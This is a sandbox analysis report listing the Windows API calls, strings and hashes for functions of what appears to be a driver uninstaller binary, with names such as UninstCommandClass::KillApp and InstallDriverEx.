                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: FileInfoTimeVersion_fputs$DebugFormatLocalMutexObjectOutputQueryReleaseSingleSizeStringValueWait_fprintf
                                  • String ID: UninstCommandClass::CheckForUpdate
                                  • API String ID: 390915327-2234398207
                                  • Opcode ID: 58a65281a1afe59366b94f5c874218a32b1037e4b62f1dc5815b83c8e0e7e6f2
                                  • Instruction ID: 45b6b8b460cf9b9f2c3a22d5026d2bdd2545ed4350fbf2acbd65fac45d841d09
                                  • Opcode Fuzzy Hash: 58a65281a1afe59366b94f5c874218a32b1037e4b62f1dc5815b83c8e0e7e6f2
                                  • Instruction Fuzzy Hash: BC01C2712401012BD600E605AC82CBBB79CEEE1794F44063FFD45A6282E639ED59D6FA
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • MessageBoxA.USER32(?,?,?,00000000), ref: 004016FA
                                    • Part of subcall function 0040BBAC: __mbsicmp_l.LIBCMT ref: 0040BBB6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$DebugFormatLocalMessageMutexObjectOutputReleaseSingleStringWait__mbsicmp_l_fprintf
                                  • String ID: CommandClass::PrintfBox$Silent$Yes
                                  • API String ID: 2910436740-4266728942
                                  • Opcode ID: 6bdcd1bbe5071bfaaa46752f55c13263a32194412c514db5d8ae3a83c72bb58e
                                  • Instruction ID: a7c1a89c27a306ffefd4404720fae03179d5bfec73edaeecf6328410b922e383
                                  • Opcode Fuzzy Hash: 6bdcd1bbe5071bfaaa46752f55c13263a32194412c514db5d8ae3a83c72bb58e
                                  • Instruction Fuzzy Hash: 1901A5B160074097C664AB149C42BEB73E9FFC4709F44883EB585921C1EF3CA40887DA
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • _memset.LIBCMT ref: 00406720
                                  • SetupDiGetDeviceInstanceIdA.SETUPAPI(?,?,?,00000400,00000000), ref: 0040673A
                                  Strings
                                  • Current Device, xrefs: 00406749
                                  • UninstCommandClass::EnumDeviceCallBack, xrefs: 0040670A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$DebugDeviceFormatInstanceLocalMutexObjectOutputReleaseSetupSingleStringWait_fprintf_memset
                                  • String ID: Current Device$UninstCommandClass::EnumDeviceCallBack
                                  • API String ID: 804095468-2669295411
                                  • Opcode ID: fb33fe03fecdb48a442d81562763ffb33676ca2b3e6f392daa12439bd6c8b69e
                                  • Instruction ID: 77090c3c9e5cc70321a5bd7babb8a529f2d091f2cc6f08800587ee826afcbc82
                                  • Opcode Fuzzy Hash: fb33fe03fecdb48a442d81562763ffb33676ca2b3e6f392daa12439bd6c8b69e
                                  • Instruction Fuzzy Hash: F80184B27043046BD620EB55DC41FABB398AB84704F80482EB709A71C2DA78A908C7AD
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • _sprintf.LIBCMT ref: 00406D65
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$DebugFormatLocalMutexObjectOutputReleaseSingleStringWait_fprintf_sprintf
                                  • String ID: ClassType$Enum\%s\{*%s}\{*}$UninstCommandClass::NvRemoveDevice9x
                                  • API String ID: 4132451974-3371136729
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 004082A3
                                  • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 004082AE
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 004082C2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: ByteCharMultiStringTimeWide_fputs$AllocDebugFormatLocalMutexObjectOutputReleaseSingleWait_fprintf
                                  • String ID: AnsiToBstr
                                  • API String ID: 8724780-1849704726
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                    • Part of subcall function 004077E0: _memset.LIBCMT ref: 0040781E
                                    • Part of subcall function 004077E0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040782A
                                    • Part of subcall function 004077E0: Process32First.KERNEL32 ref: 00407848
                                    • Part of subcall function 004077E0: _memset.LIBCMT ref: 0040786B
                                    • Part of subcall function 004077E0: Process32Next.KERNEL32(00000000,?), ref: 004078B8
                                    • Part of subcall function 004077E0: CloseHandle.KERNEL32(00000000), ref: 004078C2
                                  • OpenProcess.KERNEL32(00000001,00000000,00000000), ref: 00407926
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 0040792F
                                  • Sleep.KERNEL32(00000064), ref: 00407937
                                  Strings
                                  • UninstCommandClass::KillApp, xrefs: 00407902
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: ProcessProcess32Time_fputs_memset$CloseCreateDebugFirstFormatHandleLocalMutexNextObjectOpenOutputReleaseSingleSleepSnapshotStringTerminateToolhelp32Wait_fprintf
                                  • String ID: UninstCommandClass::KillApp
                                  • API String ID: 592201866-3161127752
                                  APIs
                                  • GetFileAttributesA.KERNEL32(?,?,?,004048C8,?,?,00000000), ref: 00404837
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID: FALSE$TRUE$UninstCommandClass::NvFileExists(%s) = %s
                                  • API String ID: 3188754299-4008997080
                                  APIs
                                  • GetLastError.KERNEL32(?,?,0040EF9A,?,0040B462,?,0040B4E2,?), ref: 0040EF1F
                                    • Part of subcall function 0040EDEF: TlsGetValue.KERNEL32(?,0040EF32,?,?,0040EF9A,?,0040B462,?,0040B4E2,?), ref: 0040EDF6
                                    • Part of subcall function 0040EDEF: TlsSetValue.KERNEL32(00000000,?,0040EF9A,?,0040B462,?,0040B4E2,?), ref: 0040EE17
                                  • __calloc_crt.LIBCMT ref: 0040EF41
                                    • Part of subcall function 00411A9E: __calloc_impl.LIBCMT ref: 00411AAC
                                    • Part of subcall function 00411A9E: Sleep.KERNEL32(00000000,0040B4E2,?), ref: 00411AC3
                                    • Part of subcall function 0040ED78: TlsGetValue.KERNEL32(00000000,0040EE0D,?,?,0040EF9A,?,0040B462,?,0040B4E2,?), ref: 0040ED85
                                    • Part of subcall function 0040ED78: TlsGetValue.KERNEL32(00000006,?,?,0040EF9A,?,0040B462,?,0040B4E2,?), ref: 0040ED9C
                                    • Part of subcall function 0040EE5E: GetModuleHandleA.KERNEL32(KERNEL32.DLL,004232D8,0000000C,0040EF6F,00000000,00000000,?,?,0040EF9A,?,0040B462,?,0040B4E2,?), ref: 0040EE6F
                                    • Part of subcall function 0040EE5E: GetProcAddress.KERNEL32(0040B4E2,EncodePointer), ref: 0040EEA3
                                    • Part of subcall function 0040EE5E: GetProcAddress.KERNEL32(0040B4E2,DecodePointer), ref: 0040EEB3
                                    • Part of subcall function 0040EE5E: InterlockedIncrement.KERNEL32(004253E8), ref: 0040EED5
                                    • Part of subcall function 0040EE5E: __lock.LIBCMT ref: 0040EEDD
                                    • Part of subcall function 0040EE5E: ___addlocaleref.LIBCMT ref: 0040EEFC
                                  • GetCurrentThreadId.KERNEL32 ref: 0040EF71
                                  • SetLastError.KERNEL32(00000000,?,?,0040EF9A,?,0040B462,?,0040B4E2,?), ref: 0040EF89
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Value$AddressErrorLastProc$CurrentHandleIncrementInterlockedModuleSleepThread___addlocaleref__calloc_crt__calloc_impl__lock
                                  • String ID:
                                  • API String ID: 1081334783-0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: __calloc_crt
                                  • String ID: ^B
                                  • API String ID: 3494438863-2078723988
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • SetupDiGetINFClassA.SETUPAPI(?,?,?,00000020,00000000), ref: 004065CC
                                    • Part of subcall function 00401820: _sprintf.LIBCMT ref: 0040186E
                                  Strings
                                  • UninstCommandClass::GetInfClassGUID, xrefs: 00406564
                                  • GetInfClassGUID: invalid number of arguments, xrefs: 00406586
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$ClassDebugFormatLocalMutexObjectOutputReleaseSetupSingleStringWait_fprintf_sprintf
                                  • String ID: GetInfClassGUID: invalid number of arguments$UninstCommandClass::GetInfClassGUID
                                  • API String ID: 4252913100-1720982049
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • SetupDiGetINFClassA.SETUPAPI(?,?,?,00000020,00000000), ref: 0040A048
                                    • Part of subcall function 00401820: _sprintf.LIBCMT ref: 0040186E
                                  Strings
                                  • InstallDriverEx: invalid number of arguments, xrefs: 00409FF6
                                  • UninstCommandClass::InstallDriverEx, xrefs: 00409FD4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$ClassDebugFormatLocalMutexObjectOutputReleaseSetupSingleStringWait_fprintf_sprintf
                                  • String ID: InstallDriverEx: invalid number of arguments$UninstCommandClass::InstallDriverEx
                                  • API String ID: 4252913100-2878319403
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • SendMessageA.USER32 ref: 00406F3E
                                  • SendMessageA.USER32(?,0000102D,?,?), ref: 00406F6B
                                    • Part of subcall function 0040BBAC: __mbsicmp_l.LIBCMT ref: 0040BBB6
                                  Strings
                                  • UninstCommandClass::CompareListTitlesCallBack, xrefs: 00406EFD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: MessageSendTime_fputs$DebugFormatLocalMutexObjectOutputReleaseSingleStringWait__mbsicmp_l_fprintf
                                  • String ID: UninstCommandClass::CompareListTitlesCallBack
                                  • API String ID: 501987998-1232878459
                                  • Opcode ID: a8b81f152b955c766df272f3090a3ddb6fc9f0c9fba4c5e051ccafc932d907d3
                                  • Instruction ID: 7d3b121fdab55ea9b6f3e8fc7f765e27bc7273f3e332872f4f3b8a74f26717f5
                                  • Opcode Fuzzy Hash: a8b81f152b955c766df272f3090a3ddb6fc9f0c9fba4c5e051ccafc932d907d3
                                  • Instruction Fuzzy Hash: 9B11E8B15143409BD320DB95C855BEBB7E8BFC8304F404A2EF58997290D7B9A508CB96
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                    • Part of subcall function 00401000: LoadStringA.USER32(?,?,004264A0,00000400), ref: 00401026
                                  • _sprintf.LIBCMT ref: 0040186E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: StringTime_fputs$DebugFormatLoadLocalMutexObjectOutputReleaseSingleWait_fprintf_sprintf
                                  • String ID: CommandClass::ScriptError$Current Script
                                  • API String ID: 3049988156-2999272666
                                  • Opcode ID: 419cc343554f9065169b5c10bab9a570bb74dd3414fb3f8e69ae77912c6b4f1a
                                  • Instruction ID: d667340ddc8c7fc7a245f04045444f3e3fa5e062efee0d217958676bda7327c4
                                  • Opcode Fuzzy Hash: 419cc343554f9065169b5c10bab9a570bb74dd3414fb3f8e69ae77912c6b4f1a
                                  • Instruction Fuzzy Hash: 9BF0FFF1A00240A7D220BB158C03FAF72989BC8B4CF40082EF704771C2EA7C698182EF
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • EnumWindows.USER32(Function_00007950,00000000), ref: 00407A2A
                                    • Part of subcall function 00401820: _sprintf.LIBCMT ref: 0040186E
                                  Strings
                                  • UninstCommandClass::NvSendMessage, xrefs: 004079C2
                                  • NvSendMessage: invalid number of arguments, xrefs: 004079E8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$DebugEnumFormatLocalMutexObjectOutputReleaseSingleStringWaitWindows_fprintf_sprintf
                                  • String ID: NvSendMessage: invalid number of arguments$UninstCommandClass::NvSendMessage
                                  • API String ID: 1975559560-3532066084
                                  • Opcode ID: 5384a3c51a7c89f310f700c0b6ff055783c6992a44b5f5a3d72d9b0471ddee57
                                  • Instruction ID: 12a72c842aab733d73b712e9640d13027d39bd6ddac5e5374347ce52616fd7b4
                                  • Opcode Fuzzy Hash: 5384a3c51a7c89f310f700c0b6ff055783c6992a44b5f5a3d72d9b0471ddee57
                                  • Instruction Fuzzy Hash: 23F02BB1B04210A7D720F73A6D06E9F66999F90718B10043FF905B32C1DA78A952C6AF
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                    • Part of subcall function 00408280: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 004082A3
                                    • Part of subcall function 00408280: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 004082AE
                                    • Part of subcall function 00408280: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 004082C2
                                  • SysStringLen.OLEAUT32(00000000), ref: 00408406
                                  • SysFreeString.OLEAUT32(00000000), ref: 0040842A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: String$ByteCharMultiTimeWide_fputs$AllocDebugFormatFreeLocalMutexObjectOutputReleaseSingleWait_fprintf
                                  • String ID: GetInstanceEnumerator
                                  • API String ID: 4178090673-2127802674
                                  • Opcode ID: 26f2d6fab2178db5a83f43d1191e5a273a6451add9de60d0e5c4f5b8c381ac3e
                                  • Instruction ID: ff6a69f69006609625373fdd8c3f89c73d170b279c4b8afbfc773a0bad1a6cb5
                                  • Opcode Fuzzy Hash: 26f2d6fab2178db5a83f43d1191e5a273a6451add9de60d0e5c4f5b8c381ac3e
                                  • Instruction Fuzzy Hash: 31F0E271204211AFD600DB54DC08F9B77D8EF84765F10466DF458D72D0EB749D0487AA